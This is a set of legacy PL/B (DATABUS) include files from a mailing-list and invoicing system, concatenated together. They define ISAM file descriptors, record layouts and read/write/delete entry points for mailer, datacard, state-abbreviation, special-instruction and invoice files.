...............................................................................
.
. ENTRY POINT : NTYPDEL
. REQUIRED : 'NTYPFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NTYPDEL BRANCH NTYPFLAG TO NTYP7
CALL NTYPOPEN
NTYP7 FILEPI 1;NTYPFILE
DELETE NTYPFILE,NTYPFLD
RETURN
...............................................................................
.
. ENTRY POINT : NTYPOPEN
. REQUIRED : 'NTYPFLAG'
. RETURNED : 'NTYPFLAG' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MAILER FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE (via FILEGONE).
.
NTYPOPEN TRAP NTYPGONE IF IO
OPEN NTYPFILE,NTYPNAME
TRAPCLR IO
MOVE C1 TO NTYPFLAG
RETURN
.
. open failed: report the missing file name and abort
NTYPGONE MOVE NTYPNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/NMDCMSCIO.inc
..............................................................................
.******************************************************
.* MISC List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* NMSC DATACARD FILES.
.* ****************************************************
.
. FILE:
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing NMSC, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : NMSCKEY
. REQUIRED : 'NMSCFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NMSCKEY BRANCH NMSCFlag TO NMSC1
CALL NMSCOpen
NMSC1 FILEPI 1;NMSCFile
READ NMSCFile,NMSCFld;NMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMSCTST
. REQUIRED : NMSCFld
. RETURNED :
. DESCRIPTION : TEST KEY (reads into STR1 only - existence check)
.
NMSCTST BRANCH NMSCFlag TO NMSC2
CALL NMSCOpen
NMSC2 FILEPI 1;NMSCFile
READ NMSCFile,NMSCFld;STR1
RETURN
..............................................................................
.
. ENTRY POINT : NMSCKS
. REQUIRED :
. RETURNED : NMSC Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
NMSCKS BRANCH NMSCFlag TO NMSC3
CALL NMSCOpen
NMSC3 FILEPI 1;NMSCFile
READKS NMSCFile;NMSCVars
RETURN
..............................................................................
. ENTRY POINT : NMSCSEQ
. REQUIRED :
. RETURNED : NMSC Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ (physical record order)
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
NMSCSEQ BRANCH NMSCFlag TO NMSC4
CALL NMSCOpen
NMSC4 FILEPI 1;NMSCFile
READ NMSCFile,SEQ;NMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMSCWRT
. REQUIRED : 'NMSCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NMSCWRT BRANCH NMSCFlag TO NMSC5
CALL NMSCOpen
NMSC5 FILEPI 1;NMSCFile
WRITE NMSCFile,NMSCFld;NMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMSCUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
NMSCUPD BRANCH NMSCFlag TO NMSC6
CALL NMSCOpen
NMSC6
FILEPI 1;NMSCFile
UPDATE NMSCFile;NMSCVars
RETURN
..............................................................................
.
. ENTRY POINT : NMSCDEL
. REQUIRED : 'NMSCFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NMSCDEL BRANCH NMSCFlag TO NMSC7
CALL NMSCOpen
NMSC7 FILEPI 1;NMSCFile
DELETE NMSCFile,NMSCFld
RETURN
..............................................................................
.
. ENTRY POINT : NMSCOpen
. REQUIRED : 'NMSCFlag' 'NMSCPATH'
. RETURNED : 'NMSCFlag' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE (via FILEGONE).
.
NMSCOpen TRAP NMSCGONE giving error IF IO
OPEN NMSCFile,NMSCName
TRAPCLR IO
MOVE C1 TO NMSCFlag
RETURN
..............................................................................
. open failed: report the missing file name and abort
NMSCGONE MOVE NMSCNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/M2NIO.inc
..............................................................................
.******************************************************
.* M2N List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* M2N DATACARD FILES.
.* ****************************************************
.
. FILE: MIN2NIN
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam fixed
...................
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing M2N, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : M2NKEY
. REQUIRED : 'M2NFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. M2NPATH selects the index path: value 1 -> M2NFile/M2NFld,
. value 2 -> M2NFile2/M2NFld2 (presumably primary vs secondary
. key - confirm against the M2N file definitions)
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
M2NKEY Branch M2nPath,M2n1a,M2n1c
M2n1a BRANCH M2NFlag TO M2N1B
CALL M2NOpen
M2N1B FILEPI 1;M2NFile
READ M2NFile,M2NFld;M2NVars
RETURN
M2n1C BRANCH M2NFlag TO M2N1D
CALL M2NOpen
M2N1D FILEPI 1;M2NFile2
READ M2NFile2,M2NFld2;M2NVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NTST
. REQUIRED : M2NFld
. RETURNED :
. DESCRIPTION : TEST KEY (reads into STR1 only; path selected by M2NPATH)
.
M2NTST Branch M2nPath,M2n2a,M2N2C
M2n2a BRANCH M2NFlag TO M2N2B
CALL M2NOpen
M2N2B FILEPI 1;M2NFile
READ M2NFile,M2NFld;STR1
RETURN
M2n2c BRANCH M2NFlag TO M2N2D
CALL M2NOpen
M2N2d FILEPI 1;M2NFile2
READ M2NFile2,M2NFld2;STR1
RETURN
..............................................................................
.
. ENTRY POINT : M2NKS
. REQUIRED :
. RETURNED : M2N Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ (path selected by M2NPATH)
.
M2NKS Branch M2NPath,M2N3a,M2N3C
M2N3A BRANCH M2NFlag TO M2N3B
CALL M2NOpen
M2N3B FILEPI 1;M2NFile
READKS M2NFile;M2NVars
RETURN
M2N3C BRANCH M2NFlag TO M2N3D
CALL M2NOpen
M2N3D FILEPI 1;M2NFile2
READKS M2NFile2;M2NVars
RETURN
..............................................................................
. ENTRY POINT : M2NSEQ
. REQUIRED :
. RETURNED : M2N Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. NOTE(review): unlike the other entry points this one does not branch
. on M2NPATH and always reads M2NFile - confirm that is intended.
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
M2NSEQ BRANCH M2NFlag TO M2N4
CALL M2NOpen
M2N4 FILEPI 1;M2NFile
READ M2NFile,SEQ;M2NVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NWRT
. REQUIRED : 'M2NFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
. (writes through the M2NFlist filelist so all indexes stay in step)
.
M2NWRT BRANCH M2NFlag TO M2N5
CALL M2NOpen
M2N5 FILEPI 1;M2NFlist
WRITE M2NFlist;M2NVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE (through the filelist)
.
M2NUPD BRANCH M2NFlag TO M2N6
CALL M2NOpen
M2N6
FILEPI 1;M2NFlist
UPDATE M2NFlist;M2NVars
RETURN
..............................................................................
.
. ENTRY POINT : M2NDEL
. REQUIRED : 'M2NFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
. NOTE(review): deletes through the filelist with no key operand -
. relies on a prior positioning read; confirm callers do one first.
.
M2NDEL BRANCH M2NFlag TO M2N7
CALL M2NOpen
M2N7 FILEPI 1;M2NFlist
DELETE M2NFList
RETURN
..............................................................................
.
. ENTRY POINT : M2NOpen
. REQUIRED : 'M2NFlag' 'M2NPATH'
. RETURNED : 'M2NFlag' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN MDC MainFILE (whole filelist in one OPEN)
. DISPLAY ERROR AND ABORT IF NOT ON-LINE (via FILEGONE).
.
M2NOpen TRAP M2NGONE giving error IF IO
OPEN M2NFList
TRAPCLR IO
MOVE C1 TO M2NFlag
RETURN
..............................................................................
. open failed: report the missing file name and abort
M2NGONE MOVE M2NNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/stabbdd.inc
; Last change: AH 19 Aug 1998 11:25 am
..............................................................................
.
. STABBDD INCLUSION
. STATE ABBREVIATION FILE DEFINITION
.
. FILE NAME : STABBREV
. REC LENGTH: 20 FIXED. INDEX KEY : 1-2 (2 POSITION STATE ABBREVIATION)
.
.
..............................................................................
.
NSTFILE IFILE KEYLEN=2,FIXED=20,UNCOMP
NSTNAME INIT "STABBREV"
.NSTFLE2 AFILE
.NSTFLE3 FILE FIXED=20
NSTFLD DIM 2 key buffer (2-char state abbreviation)
.NSTFLD2 DIM 48
.NSTFLAG FORM 1
.NSTFLG2 FORM 1
.NSTFLG3 FORM 1
.NSTPATH FORM 1
.NSTLOCK FORM 1 0 or 1=File Locks, 2=Record Locks, 3=No Locks
.
...............................................................................
*
. record layout (20 bytes fixed, key = STABB)
stvars list
STABB DIM 2 1-2 STATE ABBREVIATION. **KEY**
STNAME DIM 18 3-20 STATE NAME
listend
.
LISTOFF
.PROGRAM ACCESS.
.F:\LIBRARY\PLB_SRC
.NAME TYPE ACCESS
.F:\LIBRARY\DEVELOP
.NAME TYPE ACCESS
.F:\APPS\PLB\CODE
.NAME TYPE ACCESS
LISTON
<file_sep>/DEVELOP/Includes - why/NSPIDD.INC
..............................................................................
.
. NSPIDD INCLUSION
. NIN SPECIAL INSTRUCTION FILE DEFINITION
.
. FILE NAME : NINSPI
. REC LENGTH: 97 FIXED
. INDEX KEY : 1-3
.patch 1.0 change key field to 3 oct 10 2006
..............................................................................
.
. Patch 1.0 (oct 10 2006, per header) widened the key from 2 to 3 bytes:
. NSPIFLD/SPINO below were changed to DIM 3, but the IFILE statement was
. left at the old KEYLEN=2,FIXED=96 (identical to its commented-out
. backup - the edit was evidently forgotten).  With the 3-byte key the
. record is 3+47+47 = 97 bytes and the key occupies 1-3, matching the
. header comment (REC LENGTH: 97, INDEX KEY: 1-3).  Field offsets
. updated to the 3-byte-key layout as well.
NSPIFILE IFILE KEYLEN=3,FIXED=97,UNCOMP
.NSPIFILE IFILE KEYLEN=2,FIXED=96,UNCOMP pre-patch-1.0 layout
NSPINAME INIT "NINSPI.isi|NINS1:502 "
NSPIFLD DIM 3 key buffer (3-digit special instruction number)
.NSPIFLD DIM 2
NSPIFLAG FORM 1 non-zero once the file has been opened
.
SPINO dim 3 1-3 SPECIAL INSTRUCTION NUMBER **KEY**
.SPINO dim 2 1-2 SPECIAL INSTRUCTION NUMBER
INST1 DIM 47 4-50 SPECIAL INSTRUCTION LINE #1
INST2 DIM 47 51-97 SPECIAL INSTRUCTION LINE #2
.
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.CLEARPRT DATABUS
.DIVSPOOL DATABUS
.EPSSPOOL DATABUS
.FIXLCR DATABUS
.FIXORD DATABUS
.NINCLEAR DATABUS
.NINMAC DATABUS
.NINP11D DATABUS
.PAYORDERPRT DATABUS
.SPIMOD DATABUS
.SPOOLLCRS DATABUS
.TDMCSPOL DATABUS
.WARSPOOL DATABUS
LISTON
<file_sep>/include/MDCMSCDD.INC
.******************************************************
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_MSC
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDCMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
......................................................
MMSCNAME Init "MDC_MSC.Isi|NINS1:502"
MMSCFILE IFILE Name="MDC_MSC.Isi|NINS1:502"
MMSCSFILE FILE
.MMSCSFILE FILE Name="MDC_MSC.csv"
MMscFld Dim 6 key buffer (6-digit card number)
MMSCFLAG FORM 1 non-zero once the file has been opened
MMSCPATH FORM 1
.
. record layout (key = DDCNO); field names deliberately mirror Min's
MMSCVARS LIST .for ease I am using Min's names
DDCNO Dim 6 1-6 Card# **KEY**
DAD1 Dim 30 7-36 Addressing 1
DAD2 Dim 30 37-66 Addressing 2
DMO1 Dim 25 67-91 Min order line 1
DMO2 Dim 25 92-116 Min order line 2
DUS1 Dim 25 117-141 Unit of Sale line 1
DUS2 Dim 25 142-166 Unit of Sale line 2
DSX1 Dim 25 167-191 Gender Line 1
DSX2 Dim 25 192-216 Gender Line 2
DMD1 Dim 25 217-241 Media Line 1
DMD2 Dim 25 242-266 Media Line 2
DRS1 Dim 25 267-291 Net Name Line 1
DRS2 Dim 25 292-316 Net Name Line 2
DDLT Dim 1 317-317 'A'ctive/'I'nactive
ListEnd
<file_sep>/include/NCMPXOWNDd.inc
******************************************************************************
*VARIABLE INCLUSION FOR Company to Owner XREF FILE.
******************************************************************************
* FILE: CompXOwn
* RECORD SIZE:
* COMPRESS: NONE
* TYPE: ISAM
* KEY: 1 Company NUMBER 1-6 - DUPLICATES ALLOWED
* KEY: 2 Owner NUMBER 7-10
******************************************************************************
.
. Two indexes over the same 35-byte records: by company number
. (duplicates allowed) and by owner number.
NCXOFLst Filelist
NCXOFILE IFILE KEYLEN=6,FIX=35,DUP,Name="CompXOwn.ISI|NINS1:502"
NCXOFIL2 IFILE KEYLEN=4,FIX=35,Name="CompXOwn1.ISI|NINS1:502"
Filelistend
.
NCXOFLAG FORM 1 non-zero once index 1 has been opened
NCXOFLG2 FORM 1 non-zero once index 2 has been opened
NCXOPATH FORM 1
NCXONAME DIM 12
NCXONAM1 INIT "CompXOwn "
NCXONAM2 INIT "CompXOwn1 "
.
NCXOFLD DIM 6 key buffer for index 1 (company number)
NCXOFLD2 DIM 4 key buffer for index 2 (owner number)
.
. record layout (35 bytes fixed)
NCXOVARS LIST
NCXOComp DIM 6 1-6 Company NUMBER KEY
NCXOOwn DIM 4 7-10 Old Owner NUMBER
NCXOFill DIM 25 11-35
ListEnd
..............................................................................
<file_sep>/DEVELOP/Includes - why/ninvdd.inc
.. ninvdd.inc
.. ............................................................................
.. NAMES IN THE NEWS INCLUDE LIBRARY
.. ............................................................................
..
.. FILE: NININV
.. LENGTH: 300
.. COMPRESS: NONE
.. TYPE: ISAM, aim
.. isi KEY: 12-17 nininv.isi LR Keyl = 6
.. 124-129 Nininv.isi INVOICE NUMBERS,KEYL=6.
.sunidxnt \\nts1\e\data\text\nininv.dat,\\nts1\e\data\index\nininvdev,l300,c:\ -n,e,12-17
.sunidxnt \\nts1\e\data\text\nininv.dat,\\nts1\e\data\index\nininvdev2,l300,c:\ -n,e,124-129
.Print File:
.sunidxnt \\nts1\e\data\ninvoice.dat,\\nts1\e\data\index\ninvoice,l303,c:\ -12-17
..aim keys:
.sunadxnt \\NTS1\E\DATA\TEXT\NININV.DAT \\NTS1\E\DATA\INDEX\NININV.AAM L300 -u,209-214,223-228,237-242,20-31,274-288
.
. CHKN1 DIM 6 209-214 1ST CHECK NUMBER, AFTER CHECK RELEASED
. CHKN2 DIM 6 223-228 2ND CHECK NUMBER, ADDED AFTER CHECK RELEASED
. CHKN3 DIM 6 237-242 3rd CHECK NUMBER, should be escrow IE TDMC
. LOINVN DIM 12 20-31 LIST OWNER INVOICE NUMBER aim key nininv4
. IMLRCHK DIM 15 274-288 CHECK NUMBER MLR PAID WITH.ADDED AFTER CSH.
.*******************************************************************************
. patch 10.02 PLI
.Ninv0001 - Patch 10.00 Total rewrite and new file structure
.*patch 2.2 29Jan2004 DLH Broker Guar letter
.NINV0001 Patch 10.0 DLH June 2003
. includes change to filelist and combining of the two aimdex files.
.and increase in size of Mailer's check number from 6 to 15
.*patch 2.1 MANAGE October 2001
.*Patch 2.0 y2k etc March 1999
.*10oct94 DLH prep for nets run charge & percentage new len 302.
.*05OCT94 DLH ADD SPLIT EXCHANGE QTY & ppm new length 294
.*23feb94 DLH increase list owner invoice 6 to 12 add running charge var.
.*23APR93 DLH PREP FOR BROKER/CONSULTANT FIELDS AND MAILER CHECK NUMBER FIELD
. NEW LENGTH WILL BE : 269.
.*;ADDITIONAL NOTES: aim keys added 10/5/92
.*******************************************************************************
.
...............................................................................
.INCOME OR
.PAYCODE " "= 1 A/P A/R LR, 'STANDARD BILLING'
. "1"= NOT USED
. "2"= 2 A/P'S
. "3"= KEYIN A/P1
. "4"= GROSS A/R = LRINC.
.
...............................................................................
.ADDITIONAL CHARGE SUB-FIELDS ARE DEFINED AS FOLLOWS:
.
.BYTES DESCRIPTION.
.begin patch 2.0
..................................................................................
.add chrg key expanded to 3 see below.
. . 1-2 ADD. CHG. CODE USED TO ACCESS NINACD/TEXT.
. . 3-9 AMOUNT IF FLAT FEE, OR RATE PER M. BASED ON ADD. CHG. CODE.
. . 10-10 NOT USED
. . 11-13 PERCENTAGE OF ADD. CHG. TO LR INCOME, REMAINDER TO A/P.
. . 14-14 '1'= DON'T PRINT CHARGE ON INVOICE ie: RUNNING CHARGES
..................................................................................
. 1-3 ADD. CHG. CODE USED TO ACCESS NINACD/TEXT.
. 4-10 AMOUNT IF FLAT FEE, OR RATE PER M. BASED ON ADD. CHG. CODE.
. 11-11 NOT USED
. 12-14 PERCENTAGE OF ADD. CHG. TO LR INCOME, REMAINDER TO A/P.
. 15-15 '1'= DON'T PRINT CHARGE ON INVOICE ie: RUNNING CHARGES
.end patch 2.0
. ADD TO A/R AND A/P1 *
. ' '= STRAIGHT BILLING
. INTO A/R AND A/P1 *
. UNLESS 2 A/P'S THEN TO A/R & A/P2.
. OR INCOME/PAYCODE = '3' THEN TO A/R & LR.
. '2'= INTO A/R AND A/P1 *
.
. * ALSO PERCENTAGE MAY BE COMBINED WITH CODES 1 & 2 TO SPLIT BETWEEN
. LRINC & A/P.
...............................................................................
.
.begin patch 2.0
.begin patch 10.0
PINVFILE IFILE KEYLEN=6,FIX=303 .Print file Duplicates master + 3 bytes typist info
.PINVFILE IFILE KEYLEN=6,FIXED=412 .Print file Duplicates master + 3 bytes typist info
PINVNAME INIT "NINVOICE.ISI|NINS1:502"
.PINVNAME INIT "NINVOICE.ISI|20.20.30.103:502"
PINVFlag Form 1 non-zero once the print file has been opened
.
. Master invoice filelist: ISI by LR number (dups), ISI by invoice
. number (no dups), and one AAM with the combined aim keys listed in
. the header comments above.
NInvFLst Filelist
.NINVFILE IFILE KEYLEN=6,FIXED=302
.NINVFIL2 IFILE KEYLEN=6,FIXED=302,NODUPLICATES
.NINVFIL3 AFILE FIXED=302 .plb
.NINVFIL4 AFILE FIXED=302 .plb
.NINVFILE IFILE KEYLEN=6,FIXED=400,"NININV.ISI|20.20.30.103:502 "
.NINVFIL2 IFILE KEYLEN=6,FIXED=400,NODUPLICATES,"NININV2.ISI|20.20.30.103:502 "
.NINVFIL3 AFILE FIXED=400,"NININV.AAM|20.20.30.103:502 "
NINVFILE IFILE KEYLEN=6,FIXED=300,Name="NININV.ISI|NINS1:502 "
NINVFIL2 IFILE KEYLEN=6,FIXED=300,NODUPLICATES,Name="NININV2.ISI|NINS1:502 "
NINVFIL3 AFILE FIXED=300,Name="NININV.AAM|NINS1:502 "
.;;.sunadxnt -330-335,344-349,358-363,15-26,395-409
.;; CHKN1 DIM 6 330-335 1ST CHECK NUMBER, AFTER CHECK RELEASED
.;; CHKN2 DIM 6 344-349 2ND CHECK NUMBER, ADDED AFTER CHECK RELEASED
.;; CHKN3 DIM 6 358-363 3rd CHECK NUMBER, should be escrow IE TDMC
.;; LOINVN DIM 12 15-26 LIST OWNER INVOICE NUMBER aim key nininv4
.;; IMLRCHK DIM 6 395-400 CHECK NUMBER MLR PAID WITH.ADDED AFTER CSH.
..sunadxnt L285 -u,190-195,204-209,218-223,17-28,255-259
. CHKN1 DIM 6 190-195 1ST CHECK NUMBER, AFTER CHECK RELEASED
. CHKN2 DIM 6 204-209 2ND CHECK NUMBER, ADDED AFTER CHECK RELEASED
. CHKN3 DIM 6 218-223 3rd CHECK NUMBER, should be escrow IE TDMC
. LOINVN DIM 12 20-31 LIST OWNER INVOICE NUMBER aim key nininv4
. IMLRCHK DIM 15 255-259 CHECK NUMBER MLR PAID WITH.ADDED AFTER CSH.
.NINVFIL4 AFILE FIXED=400 .by List owner invoice # 15-26
Filelistend
.end patch 10.0
.end patch 2.0
.begin patch 2.1
NINVNAME INIT "NININV.ISI|NINS1:502 "
NINVNME1 INIT "NININV.ISI|NINS1:502 "
NINVNME2 INIT "NININV2.ISI|NINS1:502"
NINVNME3 INIT "NININV.AAM|NINS1:502"
.NINVNME3 INIT "NININV3.AAM|NINS1:502"
.NINVNME4 INIT "NININV4.AAM|NINS1:502"
.NINVNAME INIT "NININV "
.NINVNME1 INIT "NININV"
.NINVNME2 INIT "NININV2"
.end patch 2.1
NINVFLD DIM 6 lr or inv number.
.begin patch 2.0
ninvfld1 DIM 9 CHECK no 1 .\
.end patch 2.0 \
NINVFLD2 DIM 9 CHECK NO 2 .\
NINVFLD3 DIM 9 CHECK NO 3 .-> AIM KEYS.
NINVFLD4 DIM 15 LO INV NO ./
NINVFLD5 DIM 9 Mlr's check ./
NINVFLAG FORM 1 non-zero once the filelist has been opened
.begin patch 10.0
.NINVFLG2 FORM 1
.NINVFLG3 FORM 1
.NINVFLG4 FORM 1
.NINVFLG5 FORM 1
HoldINv Dim 412 ;hold invoice record (big enough to hold print record)
.end patch 10.0
NINVPATH FORM 1 1= by lr, 2= by invoice number
.
.begin patch 2.0
.Invoice master record layout (see NINVFILE, FIXED=300). Position comments
.are documentation only; the DIM/FORM sizes are authoritative.
INVVARS LIST
CODE DIM 1 1-1 CODE, "F"
STATB DIM 1 2-2 STATUS BYTE, "0" open OR "P" we have been paid, Or "e" Estimated (not booked)
.begin patch 10.0
IFiLL1 dim 2 3-4 For Expanded Mlr/Comp #
.end patch 10.0
MLRN DIM 4 5-8 MAILER NUMBER
IFiLL2 dim 3 9-11 For Expanded lr #
LRN DIM 6 12-17 LR NUMBER, ---KEY---
BILLTN DIM 1 18-18 BILL TO NUMBER
PAYTN DIM 1 19-19 PAY-TO NUMBER
LOINVN DIM 12 20-31 LIST OWNER INVOICE NUMBER aim key nininv4
AR form 10.2 32-44 ACCOUNTS RECEIVABLE (A/R), X,XXX,XXX.XX
.NOTE(review): byte 45 is unaccounted for and 46-57 is only 12 bytes for a
.10.2 form (AR above uses 13, 32-44) -- confirm real offsets before relying on them.
AP1 Form 10.2 46-57 LIST OWNER AMOUNT (A/P1), XX,XXX.XX
AP2 form 10.2 58-70 2ND ACCOUNTS PAYABLE (A/P2), X,XXX,XXX.XX
.begin patch 10.02
.AP3 Form 10.2 71-83 LIST OWNER AMOUNT (A/P1), XX,XXX.XX
AP3 Form 10.2 71-83 Inter company COmmission
.end patch 10.02
.begin patch 10.001
.COMMPCT DIM 2 84-85 COMMISSION PERCENT, .XX
COMMPCT Form 3.2 84-89 COMMISSION PERCENT, .XX
.end patch 10.001
PAYCODE DIM 1 90-90 PAYABLE CODE, BLANK,1,2,3 OR 4
IFiLL3 form 3 91-93 For Expanded QTYIn
QTYIN form 9 94-102 Quantity In (ORdered/shipped/into merge)
IFiLL4 form 3 103-105 For Expanded QTyBild
QTYBILD form 9 106-114 QUANTITY Billed (3/30/99 DLH), X,XXX,XXX
PPM form 3.2 115-120 PRICE PER M, XXX.XX
IFiLL5 dim 3 121-123 For Expanded INV#
INVNUM DIM 6 124-129 INVOICE NUMBER ---KEY---
.NOTE(review): the ...DTEc fields look like the CC of a CCYYMMDD date
.(century), though they are commented YEAR -- confirm.
INVDTEc DIM 2 130-131 INVOICE DATE (YEAR)
INVDTEY DIM 2 132-133 INVOICE DATE (YEAR)
INVDTEM DIM 2 134-135 INVOICE DATE (MONTH)
INVDTED DIM 2 136-137 INVOICE DATE (DAY)
.begin patch 10.0
.ADDCHG1 DIM 15 122-136 ADDITIONAL CHARGE #1
.ADDCHG2 DIM 15 137-151 ADDITIONAL CHARGE #2
.ADDCHG3 DIM 15 152-166 ADDITIONAL CHARGE #3
.ADDCHG4 DIM 15 167-181 ADDITIONAL CHARGE #4
.ADDCHG5 DIM 15 182-196 ADDITIONAL CHARGE #5
.ADDCHG6 DIM 15 197-211 ADDITIONAL CHARGE #6
.ADDCHG7 DIM 15 212-226 ADDITIONAL CHARGE #7
.ADDCHG8 DIM 15 227-241 ADDITIONAL CHARGE #8
.ADDCHG9 DIM 15 242-254 ADDITIONAL CHARGE #9
.ADDCHG10 DIM 15 254-269 ADDITIONAL CHARGE #10
.end patch 10.0
COBN DIM 3 138-140 CONTACT # (NIN) OR BROKER # (CMP)
invsales DIM 2 141-142 Salesman code
INCC DIM 1 143-143 INCOME CODE, "1" NOT USED
.begin patch 10.0
IFiLL6 dim 2 144-145 For Expanded lon/Comp #
.end patch 10.0
LON DIM 4 146-149 LIST OWNER NUMBER, ADDED AFTER CASH RECEIPTS
.begin patch 10.0
lon1 DIM 6 150-155 LIST OWNER NUMBER, for a/p2
lon2 DIM 6 156-161 LIST OWNER NUMBER, for a/p3
.end patch 10.0
.begin patch 2.2
.WSJPC DIM 1 288-288 W.S.J. PAYMENT CODE, "1"
WSJPC DIM 1 162-162 BRK Guar Letter "1" if first letter sent, "2" if second letter sent
.end patch 2.2
.begin patch 10.0
IFiLL7 dim 2 163-164 For Expanded Broker/Comp #
.end patch 10.0
IBRKNUM DIM 4 165-168 BROKER/CONSULTANT NUMBER.
IBRKCNT DIM 3 169-171 BROKER/CONSULTANT CONTACT NUMBER.
IRCQTY DIM 9 172-180 quantity of r/c names on net order.
IFiLL8 Form 3 181-183 For Expanded exchange qty
IREXQTY DIM 9 184-192 bILLABLE EXCHANGE QTY ON A SPLIT ORDER. 10/5
iexPPM Form 3.2 193-198 split exchange PRICE PER M, XXX.XX
irnetper dim 2 199-200 net name percentage
inetrc form 3.2 201-206 net name running charge
ADJC DIM 1 207-207 ADJUSTMENT CODE, "*" IF ADJUSTED
statpay DIM 1 208-208 "0" OPEN "P" we have paid .????nec? OR just CHECK FOR a/p AMOUNT AND a CHECK number???
CHKN1 DIM 6 209-214 1ST CHECK NUMBER, AFTER CHECK RELEASED
CHK1DTEc DIM 2 215-216 CHECK DATE (YEAR) FOR A/P 1
CHK1DTEY DIM 2 217-218 CHECK DATE (YEAR)
CHK1DTEM DIM 2 219-220 CHECK DATE (MONTH)
CHK1DTED DIM 2 221-222 CHECK DATE (DAY)
CHKN2 DIM 6 223-228 2ND CHECK NUMBER, ADDED AFTER CHECK RELEASED
CHK2DTEc DIM 2 229-230 CHECK DATE (YEAR) FOR A/P 2
CHK2DTEY DIM 2 231-232 CHECK DATE (YEAR)
CHK2DTEM DIM 2 233-234 CHECK DATE (MONTH)
CHK2DTED DIM 2 235-236 CHECK DATE (DAY)
CHKN3 DIM 6 237-242 3rd CHECK NUMBER, INter company
CHK3DTEc DIM 2 243-244 CHECK DATE (YEAR) FOR A/P 3
CHK3DTEY DIM 2 245-246 CHECK DATE (YEAR)
CHK3DTEM DIM 2 247-248 CHECK DATE (MONTH)
CHK3DTED DIM 2 249-250 CHECK DATE (DAY)
LET90D DIM 1 251-251 OVER 90-DAY LETTER CODE, "1" IF OVER 90 DAY
MLRPAYR form 10.2 252-264 MAILER $ PAYMENT RECEIVED, ADDED AFTER CASH RCT CCYYMMDD
MLRPAYD DIM 8 265-272 DATE OF MAILERS PAYMENT, ADDED AFTER CASH RCT CCYYMMDD
GUARPAY DIM 1 273-273 GUARANTEED PAYMENT CODE, "*"=we guar
.IMLRCHK DIM 6 255-400 CHECK NUMBER MLR PAID WITH.ADDED AFTER CSH.
IMLRCHK DIM 15 274-288 CHECK NUMBER MLR PAID WITH.ADDED AFTER CSH. typo somewhere this is correct location
.begin patch 10.02
.NOTE(review): XNINC re-uses bytes 71-83, the same slot as AP3 above --
.presumably only one of the two is live per record; confirm before changing either.
XNINC Form 9.2 71-83 Non COmm income INter company
.IFill9 Dim 12 289-300
.end patch 10.02
LISTend
.end patch 2.0
.. ............................................................................
<file_sep>/DEVELOP/Includes - why/NMDCCATIO.inc
..............................................................................
.******************************************************
.* NMDCC List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* NMDCC DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_035
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing NMDCC, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data not supplied
.MDC090DD - Owner
.MDCTXTDD - Text
